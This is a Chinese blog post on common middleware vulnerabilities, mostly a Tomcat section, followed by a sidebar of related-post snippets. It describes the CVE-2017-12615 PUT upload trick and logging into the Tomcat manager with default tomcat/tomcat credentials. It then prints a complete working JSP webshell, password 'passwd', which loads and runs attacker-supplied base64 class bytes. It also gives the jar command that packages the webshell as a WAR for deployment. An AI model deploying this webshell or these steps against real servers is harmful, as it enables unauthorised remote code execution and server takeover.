中间件常见漏洞(后续补充)

原创 已于 2024-09-03 23:42:14 修改 · 378 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#中间件 #apache #tomcat #nginx

于 2024-09-03 23:34:59 首次发布

中间件可以被简单理解为“中间商”或“中间桥梁”。

中间件就像是餐厅中的“服务员”:

  • 订单传递:服务员(中间件)从前台(应用程序)接收顾客的订单,然后将订单传递到厨房(数据库/服务)。
  • 沟通协调:如果厨房需要更多信息,服务员负责与前台沟通,确保订单准确无误。
  • 管理流程:服务员可以同时处理多个订单,确保厨房的工作有序进行,并且顾客不会等太久。
  • 安全保证:服务员确认顾客的身份(例如会员卡验证),确保订单处理的安全性。
  • 错误处理:如果厨房出现问题(比如原材料不足),服务员会通知前台,并处理好顾客的需求。

中间件就像是系统中的服务员,负责在前台和后台之间传递信息、管理流程、确保安全,并处理错误,从而让整个系统高效、可靠地运行

tomcat篇

tomcat 文件上传 (CVE-2017-12615)

这个比较简单,抓包改PUT 添加/路径 /..jsp/

访问即可:

Tomcat7+ 弱口令 && 后台getshell漏洞

Tomcat支持后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。

访问登录框:tomcat/tomcat进去,后台上传Deploy页面

<!-- jsp一句话木马,连接密码是passwd -->
<%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class
g(byte[] b) { return super.defineClass(b, 0, b.length); } } public byte[]
base64Decode(String str) throws Exception { try { Class clazz =
Class.forName("sun.misc.BASE64Decoder"); return (byte[])
clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) { Class clazz = Class.forName("java.util.Base64"); Object
decoder = clazz.getMethod("getDecoder").invoke(null); return (byte[])
decoder.getClass().getMethod("decode", String.class).invoke(decoder, str); } }
%> <% String cls = request.getParameter("passwd"); if (cls != null) { new
U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
} %>

打包成war包

jar cvf tomcat.war war.jsp

上传打包的tomcat.war 

生成一个tomcat的路径

中间件常见漏洞
本散修的一些学习心得与笔记,道友请自便。
09-13 2062
总结一些中间件常见漏洞
常见漏洞知识库(原理/场景/修复)
lefooter的博客
04-30 6553
SQL 注入 0x01 漏洞描述 SQL注入漏洞产生的原因是网站应用程序在编写时未对用户提交至服务器的数据进行合法性校验(类型、长度、业务参数合法性等),同时没有对用户输入数据进行有效地特殊字符过滤,使得用户的输入直接带入数据库执行,超出了SQL语句原来设计的预期结果,导致了SQL注入漏洞。 0x02 常见应用场景 SQL注入漏洞可能出现在一切与数据库交互的地方,比如常见的查询用户信息、查询订单信...
Web中间件常见漏洞
m0_52923241的博客
02-22 1577
如果攻击者通过begin.do上传的话,Weblogic在服务端会判断有没有upload目录,如果不存在会自动创建,再接着在upload目录下创建Rs_Upload_格式化后的作为目录名,紧接着获取到import_file_name字段名作为后续的文件名拼接的一部分;将/etc/php5/fpm/pool.d/www.conf中security.limit_extensions = .php中.php删除,再次在浏览器中打开,成功解析。使用burpsuite抓包,上传,得到返回的数据包中的时间戳;
常见框架漏洞
starhei.zxy的博客
08-07 2042
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
中间件漏洞
Le0nis的博客
08-07 2822
中间件漏洞Apache Tomcat 常见漏洞 Apache Tomcat 漏洞 1、/manager/html 管理后台弱口令 /manager/html 管理界面 后台弱口令 暴力破解http基础认证 用户名 密码 登陆后台上传war包 getwebshell 将webshell .jsp文件zip压缩成index.war上传 点击部署 2、Tomcat配置文件 安装目录下/co
常见中间件漏洞
mrx56的博客
07-26 275
【代码】常见中间件漏洞
Elasticsearch 常见漏洞复现合集
热门推荐
寒星的博客
05-27 1万+
Elasticsearch未授权访问 一、漏洞简介 ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放HTTP-9200端口,可被非法操作数据。 二、影响版本 ALL 三、复现过程 复现环境 vulhub 复现步骤 安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)。 http://xxxxxxxx:9200/_cat/indices 里面的indices包含了_river一般就是安装了river了。 http://xxxxxxxx:9.
JBoss漏洞总结复现
1ance's blog
10-08 2818
目录简介JBoss发序列化漏洞(CVE-2017-12149)漏洞描述漏洞原理影响范围漏洞复现修复建议JBossMQ JMS反序列化漏洞(CVE-2017-7504)漏洞描述漏洞原理影响范围复现过程修复建议JBoss JMXInvokerServlet反序列化漏洞(CVE-2015-7501)漏洞描述漏洞原理影响范围复现过程修复建议JBoss EJBInvokerServlet 反序列化漏洞(CVE-2013-4810)漏洞描述影响范围复现过程修复建议总结 简介 Jboss是一个基于J2EE的开放源代码的
中间件解析漏洞之 WebLogic集合
盾悟
03-17 8274
Oracle WebLogic Server 是一款广泛应用于企业级 Java 应用程序的中间件。版本 10.3.6.0 在过去几年中暴露了多项严重漏洞,攻击者可以利用这些漏洞实现远程代码执行(RCE)、信息泄露和横向移动。由于 WebLogic 作为企业应用的关键组件,其安全性备受关注。从信息收集得角度 页面得知weblogic得版本进而去分析这个weblogic 历史cve漏洞 从而进一步进行漏洞后渗透测试工作。
对于渗透中常见中间件、框架或组件,你会用什么工具去对他进行漏洞扫描?
03-08
同时,Nmap虽然不是专门的漏洞扫描工具,但它的脚本库可以扩展功能,检测常见漏洞,这也是一个补充建议。 用户可能还需要知道这些工具的特点,比如是否免费、是否需要安装、支持的语言等。比如X-Scan是绿色软件,不...
weblogic中间件漏洞有哪些,可以怎样获取权限?shell是什么
09-30
### **一、WebLogic中间件常见漏洞** #### 1. **反序列化漏洞** - **原理**:攻击者通过T3/IIOP协议发送恶意序列化数据,触发Java反序列化漏洞执行任意代码[^2]。 - **影响版本**: - CVE-2018-2628:影响10.3....
细说漏洞挖掘
bluemoon_0的博客
03-14 381
细说漏洞挖掘
SocketTool、串口调试助手、MQTT中间件基础
2509_94199043的博客
12-01 213
在 UDP Server 收到过 UDP Client 的数据后,其对方 IP 地址和 UDP 端口均可确定 下来,然后 UDP Server 也可以向 UDP Client 发送数据了。在串口工具COM2发送数据,COM1能收到,COM1发送的在工具里也能接收到。在 TCP Client 端的 Socket 即可收到数据12345。1)分别创建 UDP Server 和 UDP Client。然后打开串口调试工具,调整串口设置后打开串口COM2。2)先由 UDP Client 发送数据。
车载SOA中间件:智能座舱的软件核心引擎
怿星科技的博客
12-01 617
SOA中间件作为软件定义汽车的核心,正重塑智能座舱开发模式。它简化底层复杂性,提供统一视图,推动服务化生态,显著提升开发效率、扩展性与维护性。虽实时场景需优化,其价值已获行业广泛认可。未来,SOA将强化车云一体化与自适应智能,引领智能座舱升级。对从业者而言,深入理解SOA是把握技术趋势的关键,因其虽处底层,却是软件定义汽车的基石。
企业级 K8s 中间件部署(Mysql主从)
z146484的博客
11-30 660
是 Pod 对存储资源的 “申请”,Pod 通过 PVC 向集群请求特定规格的存储(如大小、访问模式),Kubernetes 会自动将 PVC 绑定到匹配的 PV(或通过 StorageClass 动态创建 PV)。:是 Kubernetes 集群中预先配置的存储资源(比如一块磁盘、Ceph RBD 块存储等),属于集群级别的资源,独立于 Pod 存在,用于提供持久化存储能力。设计的控制器,用于管理具有固定身份、持久化存储和有序部署 / 扩展 / 更新的应用(如数据库、分布式集群、消息队列等)。
【国内中间件厂商排名及四大中间件对比分析】
2509_94201641的博客
12-01 779
金蝶天燕:(1)公司体量相对较小,盈利能力弱(2)公司对前五大客户的依赖能力较强,存在客户集中风险,对金蝶中国的关联方销售风险(3)政府补助占营业收入的很大一部分,对政府补助依赖性强;随着新兴技术的涌入,一批国产中间件厂商破土而出,并在短时间内迅速发展,我国中间件市场迎来洗牌,根据市占率,当前我国中间件厂商排名依次为:东方通、宝兰德、中创股份、金蝶天燕、普元信息。普元信息:主要经营SOA产品,包括应用开发平台、业务流程平台、JavaEE应用服务器、企业门户平台、企业移动平台、自动化测试平台、企业服务总线。
docker离线安装及部署各类中间件(x86系统架构)
2509_94185571的博客
12-01 438
此文主要针对需要在x86内网服务器搭建系统的情况。
【服务治理中间件】consul介绍和基本原理
最新发布
2509_94088455的博客
12-01 883
Consul是一个服务网格解决方案,提供了一个功能齐全的控制平面,具有服务发现、配置和分段功能。这些功能中的每一项都可以根据需要单独使用,也可以一起使用来构建一个完整的服务网格。Consul需要一个数据平面,并支持代理和原生集成模型。Consul提供了一个简单的内置代理,因此一切都可以开箱即用,但也支持第三方代理集成,如Envoy。Consul的主要功能有:服务发现: Consul的客户端可以注册一个服务,比如api或mysql,其他客户端可以使用Consul来发现特定服务的提供者。
【AimRT】现代机器人通信中间件 AimRT
2509_94101018的博客
12-01 850
AimRT是智元机器人公司自主研发的一款机器人通信中间件。AimRT 是一个面向现代机器人领域的运行时开发框架。它基于 C++20 开发,轻量且易于部署,在资源管控、异步编程、部署配置等方面具有更现代的设计。旨在为开发者提供一个轻量化的 ROS2 替代中间件;AimRT 致力于整合机器人端侧、边缘端、云端等各种部署场景的研发。它服务于现代基于人工智能和云的机器人应用,提供完善的调试和性能分析工具链,以及良好的可观测性支持。AimRT 还提供了全面的插件开发接口,具有高度可扩展性。
中间件的默认或常见路径
07-08
<think>嗯,用户询问的是常见中间件的默认安装路径,这是一个很实用的系统管理问题。根据引用内容,可以看到用户之前关注过中间件配置漏洞和安全设置,说明ta可能是运维或安全人员,需要这些信息进行安全检查或环境部署。 从引用[2]中提取到了关键信息:RabbitMQ的默认安装路径是/usr/lib/rabbitmq,这很典型,因为Linux系统通常会把第三方软件放在/usr/lib或/opt目录下。引用[3]和[4]都提到了WebLogic的路径特征,即Middleware/user_projects/domains/这种结构,这是Oracle产品的典型安装模式。 考虑到用户可能需要完整清单,我整理了七种主流中间件的路径: - TomcatNginx作为基础服务通常放在/opt或/usr/share - WebLogic/Oracle特有的大写Middleware目录 - Elasticsearch这类现代工具偏好/usr/share - RabbitMQ明确在/usr/lib 特别标注了“默认”的注意事项,因为实际安装可能变化。用户之前关注配置漏洞(引用1),所以补充了配置文件位置,这对安全检查很重要。最后用警告符号强调权限问题,毕竟引用3提到过弱密码漏洞。 相关问题设计成递进式:从定位路径(基础)到安全配置(进阶)再到漏洞扫描(专业),覆盖用户可能的后续需求。特别是第3个问题关联到引用3的漏洞复现内容,应该很对用户胃口。</think>以下为常见中间件的默认安装路径整理,结合系统级实践和引用信息: ### 📁 常见中间件默认安装路径 1. **Tomcat** - Linux: `/opt/tomcat` 或 `/usr/share/tomcat` - Windows: `C:\Program Files\Apache Software Foundation\Tomcat[版本号]` - **关键配置**:`conf/server.xml`(端口/虚拟主机)[^1] 2. **Nginx** - Linux: `/usr/share/nginx` 或 `/etc/nginx` - 配置文件路径:`/etc/nginx/nginx.conf`(隐藏版本号/限制请求方法在此配置)[^2] 3. **WebLogic** - 核心路径:`Middleware/user_projects/domains/base_domain/` - 漏洞组件位置: ```bash Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat Middleware/wlserver_10.3/server/lib/wls-wsat.war ``` - *注:删除漏洞组件后需重启服务[^3][^4]* 4. **RabbitMQ** - Linux: `/usr/lib/rabbitmq` - 配置文件:`/etc/rabbitmq/rabbitmq.conf`(密码策略/虚拟主机)[^2] 5. **Elasticsearch** - Linux: `/usr/share/elasticsearch` - 安全配置:`config/elasticsearch.yml`(设置用户名/密码)[^2] 6. **Redis** - Linux: `/usr/bin/redis-server`(可执行文件) - 配置文件:`/etc/redis/redis.conf`(密码/开机自启)[^2] 7. **Nacos** - Linux: 解压路径通常为 `/usr/local/nacos` 或自定义路径 - 依赖Java环境(默认JDK路径:`/usr/lib/jvm/`)[^2] --- ### ⚠️ 注意事项 - **默认路径可能变化**:企业定制化安装或Docker容器会修改路径,需通过进程命令定位: ```bash ps aux | grep nginx # 查看Nginx实际路径 ``` - **配置文件优先级**:部分中间件加载顺序为 `安装目录/conf/ > /etc/[服务名]/` - **权限问题**:WebLogic的`user_projects`目录需Oracle用户权限[^3][^4] --- ### 🔍 相关问题 1. 如何快速定位中间件的实际安装路径?(如通过进程或环境变量) 2. 中间件配置文件加载顺序是怎样的?如何覆盖默认配置? 3. 如何安全加固中间件的默认安装(如删除测试页面、限制访问)?[^3][^4] > 引用说明: > [^1]: 中间件通过配置文件设定运行环境、端口、访问控制等参数。 > [^2]: Linux环境下中间件安装路径及安全配置方法。 > [^3][^4]: WebLogic漏洞组件路径及修复方案,需注意权限和重启操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值